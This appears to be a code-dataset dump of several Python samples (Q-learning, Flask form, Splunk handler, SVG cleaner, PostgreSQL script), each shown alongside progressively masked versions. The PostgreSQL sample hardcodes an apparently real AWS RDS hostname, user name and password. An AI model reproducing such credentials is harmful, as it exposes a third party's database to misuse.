code
stringlengths 13
1.2M
| order_type
stringclasses 1
value | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
# link https://deeplizard.com/learn/video/QK_PP_2KgGE
import gym
import numpy as np
import random
import time
from IPython.display import clear_output
# setup the env
env = gym.make("FrozenLake8x8-v0", is_slippery=False)
observation = env.reset()
# setup the q-table
action_space_size = env.action_space.n
state_space_size = env.observation_space.n
q_table = np.zeros((state_space_size, action_space_size))
#print(q_table)
# instaniate hyper-parameters
num_episodes = 10000
steps_per_episodes = 100
learning_rate = 0.1
discount_rate = 0.99
exploration_rate = 1
max_exploration_rate = 1
min_exploration_rate = 0.01
exploration_decay_rate = 0.001
# empty list to hold our rewards over time
rewards_all_episodes = []
# main loops
for episode in range(num_episodes):
state = env.reset()
done = False
rewards_current_episode = 0
for step in range(steps_per_episodes):
# exploration vs exploitation
exploration_rate_threshold = random.uniform(0,1)
if exploration_rate_threshold > exploration_rate:
action = np.argmax(q_table[state,:])
else:
action = env.action_space.sample()
next_state, reward, done, info = env.step(action)
#print(next_state)
#print(q_table.shape)
# update q-table
q_table[state, action] = q_table[state, action] * (1 - learning_rate) + learning_rate * (reward + discount_rate * np.max(q_table[next_state, :]))
state = next_state
rewards_current_episode += reward
if done == True:
break
# Exploration rate decay
exploration_rate = min_exploration_rate + (max_exploration_rate - min_exploration_rate) * np.exp(-exploration_decay_rate*episode)
rewards_all_episodes.append(rewards_current_episode)
# Calculate and print the average reward per thousand episodes
rewards_per_thousand_episodes = np.split(np.array(rewards_all_episodes),num_episodes/1000)
count = 1000
print("********Average reward per thousand episodes********\n")
for r in rewards_per_thousand_episodes:
print(count, ": ", str(sum(r/1000)))
count += 1000
# Print updated Q-table
print("\n\n********Q-table********\n")
print(q_table)
|
normal
|
{
"blob_id": "b791afec1c9fb214d1f3b4ec0ec67f905d96aabf",
"index": 3249,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor episode in range(num_episodes):\n state = env.reset()\n done = False\n rewards_current_episode = 0\n for step in range(steps_per_episodes):\n exploration_rate_threshold = random.uniform(0, 1)\n if exploration_rate_threshold > exploration_rate:\n action = np.argmax(q_table[state, :])\n else:\n action = env.action_space.sample()\n next_state, reward, done, info = env.step(action)\n q_table[state, action] = q_table[state, action] * (1 - learning_rate\n ) + learning_rate * (reward + discount_rate * np.max(q_table[\n next_state, :]))\n state = next_state\n rewards_current_episode += reward\n if done == True:\n break\n exploration_rate = min_exploration_rate + (max_exploration_rate -\n min_exploration_rate) * np.exp(-exploration_decay_rate * episode)\n rewards_all_episodes.append(rewards_current_episode)\n<mask token>\nprint('********Average reward per thousand episodes********\\n')\nfor r in rewards_per_thousand_episodes:\n print(count, ': ', str(sum(r / 1000)))\n count += 1000\nprint(\"\"\"\n\n********Q-table********\n\"\"\")\nprint(q_table)\n",
"step-3": "<mask token>\nenv = gym.make('FrozenLake8x8-v0', is_slippery=False)\nobservation = env.reset()\naction_space_size = env.action_space.n\nstate_space_size = env.observation_space.n\nq_table = np.zeros((state_space_size, action_space_size))\nnum_episodes = 10000\nsteps_per_episodes = 100\nlearning_rate = 0.1\ndiscount_rate = 0.99\nexploration_rate = 1\nmax_exploration_rate = 1\nmin_exploration_rate = 0.01\nexploration_decay_rate = 0.001\nrewards_all_episodes = []\nfor episode in range(num_episodes):\n state = env.reset()\n done = False\n rewards_current_episode = 0\n for step in range(steps_per_episodes):\n exploration_rate_threshold = random.uniform(0, 1)\n if exploration_rate_threshold > exploration_rate:\n action = np.argmax(q_table[state, :])\n else:\n action = env.action_space.sample()\n next_state, reward, done, info = env.step(action)\n q_table[state, action] = q_table[state, action] * (1 - learning_rate\n ) + learning_rate * (reward + discount_rate * np.max(q_table[\n next_state, :]))\n state = next_state\n rewards_current_episode += reward\n if done == True:\n break\n exploration_rate = min_exploration_rate + (max_exploration_rate -\n min_exploration_rate) * np.exp(-exploration_decay_rate * episode)\n rewards_all_episodes.append(rewards_current_episode)\nrewards_per_thousand_episodes = np.split(np.array(rewards_all_episodes), \n num_episodes / 1000)\ncount = 1000\nprint('********Average reward per thousand episodes********\\n')\nfor r in rewards_per_thousand_episodes:\n print(count, ': ', str(sum(r / 1000)))\n count += 1000\nprint(\"\"\"\n\n********Q-table********\n\"\"\")\nprint(q_table)\n",
"step-4": "import gym\nimport numpy as np\nimport random\nimport time\nfrom IPython.display import clear_output\nenv = gym.make('FrozenLake8x8-v0', is_slippery=False)\nobservation = env.reset()\naction_space_size = env.action_space.n\nstate_space_size = env.observation_space.n\nq_table = np.zeros((state_space_size, action_space_size))\nnum_episodes = 10000\nsteps_per_episodes = 100\nlearning_rate = 0.1\ndiscount_rate = 0.99\nexploration_rate = 1\nmax_exploration_rate = 1\nmin_exploration_rate = 0.01\nexploration_decay_rate = 0.001\nrewards_all_episodes = []\nfor episode in range(num_episodes):\n state = env.reset()\n done = False\n rewards_current_episode = 0\n for step in range(steps_per_episodes):\n exploration_rate_threshold = random.uniform(0, 1)\n if exploration_rate_threshold > exploration_rate:\n action = np.argmax(q_table[state, :])\n else:\n action = env.action_space.sample()\n next_state, reward, done, info = env.step(action)\n q_table[state, action] = q_table[state, action] * (1 - learning_rate\n ) + learning_rate * (reward + discount_rate * np.max(q_table[\n next_state, :]))\n state = next_state\n rewards_current_episode += reward\n if done == True:\n break\n exploration_rate = min_exploration_rate + (max_exploration_rate -\n min_exploration_rate) * np.exp(-exploration_decay_rate * episode)\n rewards_all_episodes.append(rewards_current_episode)\nrewards_per_thousand_episodes = np.split(np.array(rewards_all_episodes), \n num_episodes / 1000)\ncount = 1000\nprint('********Average reward per thousand episodes********\\n')\nfor r in rewards_per_thousand_episodes:\n print(count, ': ', str(sum(r / 1000)))\n count += 1000\nprint(\"\"\"\n\n********Q-table********\n\"\"\")\nprint(q_table)\n",
"step-5": "# link https://deeplizard.com/learn/video/QK_PP_2KgGE\nimport gym\nimport numpy as np\nimport random\nimport time\nfrom IPython.display import clear_output\n\n# setup the env\nenv = gym.make(\"FrozenLake8x8-v0\", is_slippery=False)\nobservation = env.reset()\n\n# setup the q-table\naction_space_size = env.action_space.n\nstate_space_size = env.observation_space.n\nq_table = np.zeros((state_space_size, action_space_size))\n#print(q_table)\n\n# instaniate hyper-parameters\nnum_episodes = 10000\nsteps_per_episodes = 100\nlearning_rate = 0.1\ndiscount_rate = 0.99\nexploration_rate = 1\nmax_exploration_rate = 1\nmin_exploration_rate = 0.01\nexploration_decay_rate = 0.001\n\n# empty list to hold our rewards over time\nrewards_all_episodes = []\n \n # main loops\nfor episode in range(num_episodes):\n state = env.reset()\n done = False\n rewards_current_episode = 0\n \n for step in range(steps_per_episodes):\n \n # exploration vs exploitation\n exploration_rate_threshold = random.uniform(0,1)\n if exploration_rate_threshold > exploration_rate:\n action = np.argmax(q_table[state,:])\n else:\n action = env.action_space.sample()\n \n next_state, reward, done, info = env.step(action)\n #print(next_state)\n #print(q_table.shape)\n\n # update q-table\n q_table[state, action] = q_table[state, action] * (1 - learning_rate) + learning_rate * (reward + discount_rate * np.max(q_table[next_state, :]))\n\n state = next_state\n rewards_current_episode += reward\n \n if done == True:\n break\n \n # Exploration rate decay\n exploration_rate = min_exploration_rate + (max_exploration_rate - min_exploration_rate) * np.exp(-exploration_decay_rate*episode)\n rewards_all_episodes.append(rewards_current_episode)\n\n# Calculate and print the average reward per thousand episodes\nrewards_per_thousand_episodes = np.split(np.array(rewards_all_episodes),num_episodes/1000)\ncount = 1000\n\nprint(\"********Average reward per thousand episodes********\\n\")\nfor r in rewards_per_thousand_episodes:\n print(count, \": \", str(sum(r/1000)))\n count += 1000\n\n# Print updated Q-table\nprint(\"\\n\\n********Q-table********\\n\")\nprint(q_table)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from wtforms import StringField, PasswordField
from wtforms.validators import DataRequired
from flask_wtf import FlaskForm
# ...
class LoginForm(FlaskForm):
"""登录表单类"""
username = StringField('用户名', validators=[DataRequired()])
password = PasswordField('密码', validators=[DataRequired()])
|
normal
|
{
"blob_id": "6ad2014191215dac97ad6fc6a026512c3d1866dc",
"index": 8244,
"step-1": "<mask token>\n\n\nclass LoginForm(FlaskForm):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass LoginForm(FlaskForm):\n <mask token>\n username = StringField('用户名', validators=[DataRequired()])\n password = PasswordField('密码', validators=[DataRequired()])\n",
"step-3": "<mask token>\n\n\nclass LoginForm(FlaskForm):\n \"\"\"登录表单类\"\"\"\n username = StringField('用户名', validators=[DataRequired()])\n password = PasswordField('密码', validators=[DataRequired()])\n",
"step-4": "from wtforms import StringField, PasswordField\nfrom wtforms.validators import DataRequired\nfrom flask_wtf import FlaskForm\n\n\nclass LoginForm(FlaskForm):\n \"\"\"登录表单类\"\"\"\n username = StringField('用户名', validators=[DataRequired()])\n password = PasswordField('密码', validators=[DataRequired()])\n",
"step-5": "from wtforms import StringField, PasswordField\nfrom wtforms.validators import DataRequired\nfrom flask_wtf import FlaskForm\n\n\n# ...\nclass LoginForm(FlaskForm):\n \"\"\"登录表单类\"\"\"\n username = StringField('用户名', validators=[DataRequired()])\n password = PasswordField('密码', validators=[DataRequired()])",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
class Solution(object):
def gcdOfStrings(self, str1, str2):
if str1 == str2:
return str1
elif not str1 or not str2:
return ''
elif str1.startswith(str2):
return self.gcdOfStrings(str1[len(str2):], str2)
elif str2.startswith(str1):
return self.gcdOfStrings(str1, str2[len(str1):])
else:
return ''
|
normal
|
{
"blob_id": "ab632c3c8a7f295a890de19af82fde87c6d600bc",
"index": 1674,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n",
"step-3": "class Solution(object):\n\n def gcdOfStrings(self, str1, str2):\n if str1 == str2:\n return str1\n elif not str1 or not str2:\n return ''\n elif str1.startswith(str2):\n return self.gcdOfStrings(str1[len(str2):], str2)\n elif str2.startswith(str1):\n return self.gcdOfStrings(str1, str2[len(str1):])\n else:\n return ''\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import splunk.admin as admin
import splunk.entity as en
class ConfigApp(admin.MConfigHandler):
def setup(self):
if self.requestedAction == admin.ACTION_EDIT:
for myarg in ['api_key']:
self.supportedArgs.addOptArg(myarg)
def handleList(self, confInfo):
confDict = self.readConf("appsetup")
if None != confDict:
for stanza, settings in confDict.items():
for key, val in settings.items():
if key in ['api_key'] and val in [None, '']:
val = ''
confInfo[stanza].append(key, val)
def handleEdit(self, confInfo):
name = self.callerArgs.id
args = self.callerArgs
self.writeConf('appsetup', 'app_config', self.callerArgs.data)
admin.init(ConfigApp, admin.CONTEXT_NONE)
|
normal
|
{
"blob_id": "8d6c58e9ef4e14a089a7eb33a92214d081ed7692",
"index": 8462,
"step-1": "<mask token>\n\n\nclass ConfigApp(admin.MConfigHandler):\n <mask token>\n\n def handleList(self, confInfo):\n confDict = self.readConf('appsetup')\n if None != confDict:\n for stanza, settings in confDict.items():\n for key, val in settings.items():\n if key in ['api_key'] and val in [None, '']:\n val = ''\n confInfo[stanza].append(key, val)\n\n def handleEdit(self, confInfo):\n name = self.callerArgs.id\n args = self.callerArgs\n self.writeConf('appsetup', 'app_config', self.callerArgs.data)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ConfigApp(admin.MConfigHandler):\n\n def setup(self):\n if self.requestedAction == admin.ACTION_EDIT:\n for myarg in ['api_key']:\n self.supportedArgs.addOptArg(myarg)\n\n def handleList(self, confInfo):\n confDict = self.readConf('appsetup')\n if None != confDict:\n for stanza, settings in confDict.items():\n for key, val in settings.items():\n if key in ['api_key'] and val in [None, '']:\n val = ''\n confInfo[stanza].append(key, val)\n\n def handleEdit(self, confInfo):\n name = self.callerArgs.id\n args = self.callerArgs\n self.writeConf('appsetup', 'app_config', self.callerArgs.data)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ConfigApp(admin.MConfigHandler):\n\n def setup(self):\n if self.requestedAction == admin.ACTION_EDIT:\n for myarg in ['api_key']:\n self.supportedArgs.addOptArg(myarg)\n\n def handleList(self, confInfo):\n confDict = self.readConf('appsetup')\n if None != confDict:\n for stanza, settings in confDict.items():\n for key, val in settings.items():\n if key in ['api_key'] and val in [None, '']:\n val = ''\n confInfo[stanza].append(key, val)\n\n def handleEdit(self, confInfo):\n name = self.callerArgs.id\n args = self.callerArgs\n self.writeConf('appsetup', 'app_config', self.callerArgs.data)\n\n\nadmin.init(ConfigApp, admin.CONTEXT_NONE)\n",
"step-4": "import splunk.admin as admin\nimport splunk.entity as en\n\n\nclass ConfigApp(admin.MConfigHandler):\n\n def setup(self):\n if self.requestedAction == admin.ACTION_EDIT:\n for myarg in ['api_key']:\n self.supportedArgs.addOptArg(myarg)\n\n def handleList(self, confInfo):\n confDict = self.readConf('appsetup')\n if None != confDict:\n for stanza, settings in confDict.items():\n for key, val in settings.items():\n if key in ['api_key'] and val in [None, '']:\n val = ''\n confInfo[stanza].append(key, val)\n\n def handleEdit(self, confInfo):\n name = self.callerArgs.id\n args = self.callerArgs\n self.writeConf('appsetup', 'app_config', self.callerArgs.data)\n\n\nadmin.init(ConfigApp, admin.CONTEXT_NONE)\n",
"step-5": "import splunk.admin as admin\nimport splunk.entity as en\n \nclass ConfigApp(admin.MConfigHandler):\n\tdef setup(self):\n\t\tif self.requestedAction == admin.ACTION_EDIT:\n\t\t\tfor myarg in ['api_key']:\n\t\t\t\tself.supportedArgs.addOptArg(myarg)\n \n\tdef handleList(self, confInfo):\n\t\tconfDict = self.readConf(\"appsetup\")\n\t\tif None != confDict:\n\t\t\tfor stanza, settings in confDict.items():\n\t\t\t\tfor key, val in settings.items():\n\t\t\t\t\tif key in ['api_key'] and val in [None, '']:\n\t\t\t\t\t\tval = ''\n\t\t\t\t\tconfInfo[stanza].append(key, val)\n \n\tdef handleEdit(self, confInfo):\n\t\tname = self.callerArgs.id\n\t\targs = self.callerArgs\n\t\tself.writeConf('appsetup', 'app_config', self.callerArgs.data)\n \nadmin.init(ConfigApp, admin.CONTEXT_NONE)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import psycopg2
host = "datavis.cauuh8vzeelb.us-east-1.rds.amazonaws.com"
database = "top5"
user = "teamwonder"
password = "visproject"
Gentrifying = [10002,10003,10009,10026,10027,10029,10030,10031,10032,10033,10034,10035,10037,10039,10040,10454,10455,10456,10457,10458,10459,10460,10474,11102,11103,11105,11106,11206,11211,11212,11213,11216,11220,11221,11222,11225,11232,11233,11237,11249,11370]
Non_Gentrifying = [10451,10452,10453,10463,10468,10472,10473,11204,11208,11214,11223,11224,11239]
Higher_Income = [83,7020,7030,7114,10000,10001,10004,10005,10006,10007,10010,10011,10012,10013,10014,10016,10017,10018,10019,10020,10021,10022,10023,10024,10025,10028,10036,10038,10041,10044,10045,10048,10055,10065,10069,10075,10103,10104,10105,10107,10111,10112,10118,10119,10120,10121,10122,10123,10128,10129,10153,10154,10155,10158,10162,10165,10166,10167,10168,10169,10170,10171,10172,10173,10177,10178,10179,10270,10271,10278,10279,10280,10281,10282,10301,10302,10303,10304,10305,10306,10307,10308,10309,10310,10312,10314,10461,10462,10464,10465,10466,10467,10469,10470,10471,10475,10507,10704,10803,11001,11004,11005,11040,11101,11104,11109,11201,11203,11205,11207,11209,11210,11215,11217,11218,11219,11226,11228,11229,11230,11231,11234,11235,11236,11238,11241,11242,11251,11354,11355,11356,11357,11358,11359,11360,11361,11362,11363,11364,11365,11366,11367,11368,11369,11371,11372,11373,11374,11375,11377,11378,11379,11385,11411,11412,11413,11414,11415,11416,11417,11418,11419,11420,11421,11422,11423,11426,11427,11428,11429,11430,11432,11433,11434,11435,11436,11530,11691,11692,11693,11694,11695,11697]
con = psycopg2.connect(host=host, database=database, user=user, password=password)
cur = con.cursor()
|
normal
|
{
"blob_id": "0ebf5646ee9693b7d0c1de61436e05b3725b2c9f",
"index": 2560,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nhost = 'datavis.cauuh8vzeelb.us-east-1.rds.amazonaws.com'\ndatabase = 'top5'\nuser = 'teamwonder'\npassword = 'visproject'\nGentrifying = [10002, 10003, 10009, 10026, 10027, 10029, 10030, 10031, \n 10032, 10033, 10034, 10035, 10037, 10039, 10040, 10454, 10455, 10456, \n 10457, 10458, 10459, 10460, 10474, 11102, 11103, 11105, 11106, 11206, \n 11211, 11212, 11213, 11216, 11220, 11221, 11222, 11225, 11232, 11233, \n 11237, 11249, 11370]\nNon_Gentrifying = [10451, 10452, 10453, 10463, 10468, 10472, 10473, 11204, \n 11208, 11214, 11223, 11224, 11239]\nHigher_Income = [83, 7020, 7030, 7114, 10000, 10001, 10004, 10005, 10006, \n 10007, 10010, 10011, 10012, 10013, 10014, 10016, 10017, 10018, 10019, \n 10020, 10021, 10022, 10023, 10024, 10025, 10028, 10036, 10038, 10041, \n 10044, 10045, 10048, 10055, 10065, 10069, 10075, 10103, 10104, 10105, \n 10107, 10111, 10112, 10118, 10119, 10120, 10121, 10122, 10123, 10128, \n 10129, 10153, 10154, 10155, 10158, 10162, 10165, 10166, 10167, 10168, \n 10169, 10170, 10171, 10172, 10173, 10177, 10178, 10179, 10270, 10271, \n 10278, 10279, 10280, 10281, 10282, 10301, 10302, 10303, 10304, 10305, \n 10306, 10307, 10308, 10309, 10310, 10312, 10314, 10461, 10462, 10464, \n 10465, 10466, 10467, 10469, 10470, 10471, 10475, 10507, 10704, 10803, \n 11001, 11004, 11005, 11040, 11101, 11104, 11109, 11201, 11203, 11205, \n 11207, 11209, 11210, 11215, 11217, 11218, 11219, 11226, 11228, 11229, \n 11230, 11231, 11234, 11235, 11236, 11238, 11241, 11242, 11251, 11354, \n 11355, 11356, 11357, 11358, 11359, 11360, 11361, 11362, 11363, 11364, \n 11365, 11366, 11367, 11368, 11369, 11371, 11372, 11373, 11374, 11375, \n 11377, 11378, 11379, 11385, 11411, 11412, 11413, 11414, 11415, 11416, \n 11417, 11418, 11419, 11420, 11421, 11422, 11423, 11426, 11427, 11428, \n 11429, 11430, 11432, 11433, 11434, 11435, 11436, 11530, 11691, 11692, \n 11693, 11694, 11695, 11697]\ncon = psycopg2.connect(host=host, database=database, user=user, password=\n password)\ncur = con.cursor()\n",
"step-3": "import psycopg2\nhost = 'datavis.cauuh8vzeelb.us-east-1.rds.amazonaws.com'\ndatabase = 'top5'\nuser = 'teamwonder'\npassword = 'visproject'\nGentrifying = [10002, 10003, 10009, 10026, 10027, 10029, 10030, 10031, \n 10032, 10033, 10034, 10035, 10037, 10039, 10040, 10454, 10455, 10456, \n 10457, 10458, 10459, 10460, 10474, 11102, 11103, 11105, 11106, 11206, \n 11211, 11212, 11213, 11216, 11220, 11221, 11222, 11225, 11232, 11233, \n 11237, 11249, 11370]\nNon_Gentrifying = [10451, 10452, 10453, 10463, 10468, 10472, 10473, 11204, \n 11208, 11214, 11223, 11224, 11239]\nHigher_Income = [83, 7020, 7030, 7114, 10000, 10001, 10004, 10005, 10006, \n 10007, 10010, 10011, 10012, 10013, 10014, 10016, 10017, 10018, 10019, \n 10020, 10021, 10022, 10023, 10024, 10025, 10028, 10036, 10038, 10041, \n 10044, 10045, 10048, 10055, 10065, 10069, 10075, 10103, 10104, 10105, \n 10107, 10111, 10112, 10118, 10119, 10120, 10121, 10122, 10123, 10128, \n 10129, 10153, 10154, 10155, 10158, 10162, 10165, 10166, 10167, 10168, \n 10169, 10170, 10171, 10172, 10173, 10177, 10178, 10179, 10270, 10271, \n 10278, 10279, 10280, 10281, 10282, 10301, 10302, 10303, 10304, 10305, \n 10306, 10307, 10308, 10309, 10310, 10312, 10314, 10461, 10462, 10464, \n 10465, 10466, 10467, 10469, 10470, 10471, 10475, 10507, 10704, 10803, \n 11001, 11004, 11005, 11040, 11101, 11104, 11109, 11201, 11203, 11205, \n 11207, 11209, 11210, 11215, 11217, 11218, 11219, 11226, 11228, 11229, \n 11230, 11231, 11234, 11235, 11236, 11238, 11241, 11242, 11251, 11354, \n 11355, 11356, 11357, 11358, 11359, 11360, 11361, 11362, 11363, 11364, \n 11365, 11366, 11367, 11368, 11369, 11371, 11372, 11373, 11374, 11375, \n 11377, 11378, 11379, 11385, 11411, 11412, 11413, 11414, 11415, 11416, \n 11417, 11418, 11419, 11420, 11421, 11422, 11423, 11426, 11427, 11428, \n 11429, 11430, 11432, 11433, 11434, 11435, 11436, 11530, 11691, 11692, \n 11693, 11694, 11695, 11697]\ncon = psycopg2.connect(host=host, database=database, user=user, password=\n password)\ncur = con.cursor()\n",
"step-4": "import psycopg2\n\nhost = \"datavis.cauuh8vzeelb.us-east-1.rds.amazonaws.com\"\ndatabase = \"top5\"\nuser = \"teamwonder\"\npassword = \"visproject\"\n\nGentrifying = [10002,10003,10009,10026,10027,10029,10030,10031,10032,10033,10034,10035,10037,10039,10040,10454,10455,10456,10457,10458,10459,10460,10474,11102,11103,11105,11106,11206,11211,11212,11213,11216,11220,11221,11222,11225,11232,11233,11237,11249,11370]\nNon_Gentrifying = [10451,10452,10453,10463,10468,10472,10473,11204,11208,11214,11223,11224,11239]\nHigher_Income = [83,7020,7030,7114,10000,10001,10004,10005,10006,10007,10010,10011,10012,10013,10014,10016,10017,10018,10019,10020,10021,10022,10023,10024,10025,10028,10036,10038,10041,10044,10045,10048,10055,10065,10069,10075,10103,10104,10105,10107,10111,10112,10118,10119,10120,10121,10122,10123,10128,10129,10153,10154,10155,10158,10162,10165,10166,10167,10168,10169,10170,10171,10172,10173,10177,10178,10179,10270,10271,10278,10279,10280,10281,10282,10301,10302,10303,10304,10305,10306,10307,10308,10309,10310,10312,10314,10461,10462,10464,10465,10466,10467,10469,10470,10471,10475,10507,10704,10803,11001,11004,11005,11040,11101,11104,11109,11201,11203,11205,11207,11209,11210,11215,11217,11218,11219,11226,11228,11229,11230,11231,11234,11235,11236,11238,11241,11242,11251,11354,11355,11356,11357,11358,11359,11360,11361,11362,11363,11364,11365,11366,11367,11368,11369,11371,11372,11373,11374,11375,11377,11378,11379,11385,11411,11412,11413,11414,11415,11416,11417,11418,11419,11420,11421,11422,11423,11426,11427,11428,11429,11430,11432,11433,11434,11435,11436,11530,11691,11692,11693,11694,11695,11697]\n\ncon = psycopg2.connect(host=host, database=database, user=user, password=password)\ncur = con.cursor()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python3
# -*- coding: ascii -*-
"""
A script removing animations from SVG graphics.
"""
import sys, os, re
# etree fails utterly at producing nice-looking XML
from xml.dom import minidom
def process(inpt, outp):
def traverse(node):
for child in node.childNodes:
if child.nodeType != minidom.Node.ELEMENT_NODE:
continue
elif child.tagName in ('animate', 'animateTransform'):
node.removeChild(child)
elif child.tagName in ('style', 'script'):
if child.getAttribute('key') == 'animation':
node.removeChild(child)
else:
traverse(child)
node.normalize()
if len(node.childNodes) == 0: return
for child in (node.childNodes[0], node.childNodes[-1]):
if child.nodeType != minidom.Node.TEXT_NODE:
continue
if not child.data.isspace() or child.data.count('\n') <= 1:
continue
if len(node.childNodes) == 1:
node.removeChild(child)
return
child.data = re.sub(r'\n.*\n', r'\n', child.data)
document = minidom.parse(inpt)
traverse(document.documentElement)
outp.write('<?xml version="1.0" encoding="utf-8"?>\n')
document.documentElement.writexml(outp)
outp.write('\n')
def main():
if len(sys.argv) != 3:
sys.stderr.write('USAGE: %s input output\n' % sys.argv[0])
sys.stderr.flush()
sys.exit(0)
with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:
process(inpt, outp)
if __name__ == '__main__': main()
|
normal
|
{
"blob_id": "f819d1b1f2f6f3052247cda592007eac40aca37a",
"index": 7927,
"step-1": "<mask token>\n\n\ndef main():\n if len(sys.argv) != 3:\n sys.stderr.write('USAGE: %s input output\\n' % sys.argv[0])\n sys.stderr.flush()\n sys.exit(0)\n with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:\n process(inpt, outp)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef process(inpt, outp):\n\n def traverse(node):\n for child in node.childNodes:\n if child.nodeType != minidom.Node.ELEMENT_NODE:\n continue\n elif child.tagName in ('animate', 'animateTransform'):\n node.removeChild(child)\n elif child.tagName in ('style', 'script'):\n if child.getAttribute('key') == 'animation':\n node.removeChild(child)\n else:\n traverse(child)\n node.normalize()\n if len(node.childNodes) == 0:\n return\n for child in (node.childNodes[0], node.childNodes[-1]):\n if child.nodeType != minidom.Node.TEXT_NODE:\n continue\n if not child.data.isspace() or child.data.count('\\n') <= 1:\n continue\n if len(node.childNodes) == 1:\n node.removeChild(child)\n return\n child.data = re.sub('\\\\n.*\\\\n', '\\\\n', child.data)\n document = minidom.parse(inpt)\n traverse(document.documentElement)\n outp.write('<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n')\n document.documentElement.writexml(outp)\n outp.write('\\n')\n\n\ndef main():\n if len(sys.argv) != 3:\n sys.stderr.write('USAGE: %s input output\\n' % sys.argv[0])\n sys.stderr.flush()\n sys.exit(0)\n with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:\n process(inpt, outp)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef process(inpt, outp):\n\n def traverse(node):\n for child in node.childNodes:\n if child.nodeType != minidom.Node.ELEMENT_NODE:\n continue\n elif child.tagName in ('animate', 'animateTransform'):\n node.removeChild(child)\n elif child.tagName in ('style', 'script'):\n if child.getAttribute('key') == 'animation':\n node.removeChild(child)\n else:\n traverse(child)\n node.normalize()\n if len(node.childNodes) == 0:\n return\n for child in (node.childNodes[0], node.childNodes[-1]):\n if child.nodeType != minidom.Node.TEXT_NODE:\n continue\n if not child.data.isspace() or child.data.count('\\n') <= 1:\n continue\n if len(node.childNodes) == 1:\n node.removeChild(child)\n return\n child.data = re.sub('\\\\n.*\\\\n', '\\\\n', child.data)\n document = minidom.parse(inpt)\n traverse(document.documentElement)\n outp.write('<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n')\n document.documentElement.writexml(outp)\n outp.write('\\n')\n\n\ndef main():\n if len(sys.argv) != 3:\n sys.stderr.write('USAGE: %s input output\\n' % sys.argv[0])\n sys.stderr.flush()\n sys.exit(0)\n with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:\n process(inpt, outp)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport sys, os, re\nfrom xml.dom import minidom\n\n\ndef process(inpt, outp):\n\n def traverse(node):\n for child in node.childNodes:\n if child.nodeType != minidom.Node.ELEMENT_NODE:\n continue\n elif child.tagName in ('animate', 'animateTransform'):\n node.removeChild(child)\n elif child.tagName in ('style', 'script'):\n if child.getAttribute('key') == 'animation':\n node.removeChild(child)\n else:\n traverse(child)\n node.normalize()\n if len(node.childNodes) == 0:\n return\n for child in (node.childNodes[0], node.childNodes[-1]):\n if child.nodeType != minidom.Node.TEXT_NODE:\n continue\n if not child.data.isspace() or child.data.count('\\n') <= 1:\n continue\n if len(node.childNodes) == 1:\n node.removeChild(child)\n return\n child.data = re.sub('\\\\n.*\\\\n', '\\\\n', child.data)\n document = minidom.parse(inpt)\n traverse(document.documentElement)\n outp.write('<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n')\n document.documentElement.writexml(outp)\n outp.write('\\n')\n\n\ndef main():\n if len(sys.argv) != 3:\n sys.stderr.write('USAGE: %s input output\\n' % sys.argv[0])\n sys.stderr.flush()\n sys.exit(0)\n with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:\n process(inpt, outp)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: ascii -*-\n\n\"\"\"\nA script removing animations from SVG graphics.\n\"\"\"\n\nimport sys, os, re\n\n# etree fails utterly at producing nice-looking XML\nfrom xml.dom import minidom\n\ndef process(inpt, outp):\n def traverse(node):\n for child in node.childNodes:\n if child.nodeType != minidom.Node.ELEMENT_NODE:\n continue\n elif child.tagName in ('animate', 'animateTransform'):\n node.removeChild(child)\n elif child.tagName in ('style', 'script'):\n if child.getAttribute('key') == 'animation':\n node.removeChild(child)\n else:\n traverse(child)\n node.normalize()\n if len(node.childNodes) == 0: return\n for child in (node.childNodes[0], node.childNodes[-1]):\n if child.nodeType != minidom.Node.TEXT_NODE:\n continue\n if not child.data.isspace() or child.data.count('\\n') <= 1:\n continue\n if len(node.childNodes) == 1:\n node.removeChild(child)\n return\n child.data = re.sub(r'\\n.*\\n', r'\\n', child.data)\n document = minidom.parse(inpt)\n traverse(document.documentElement)\n outp.write('<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n')\n document.documentElement.writexml(outp)\n outp.write('\\n')\n\ndef main():\n if len(sys.argv) != 3:\n sys.stderr.write('USAGE: %s input output\\n' % sys.argv[0])\n sys.stderr.flush()\n sys.exit(0)\n with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:\n process(inpt, outp)\n\nif __name__ == '__main__': main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from sqlitedict import SqliteDict
import sys
import socket
import urllib
import argparse
import zlib, pickle, sqlite3
import random
from datetime import datetime
import time
from urllib.parse import urlparse
import hashlib
import subprocess
import requests
from multiprocessing import Pool
def gz_encode(obj):
return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)))
def gz_decode(obj):
return pickle.loads(zlib.decompress(bytes(obj)))
if __name__=="__main__":
parser = argparse.ArgumentParser()
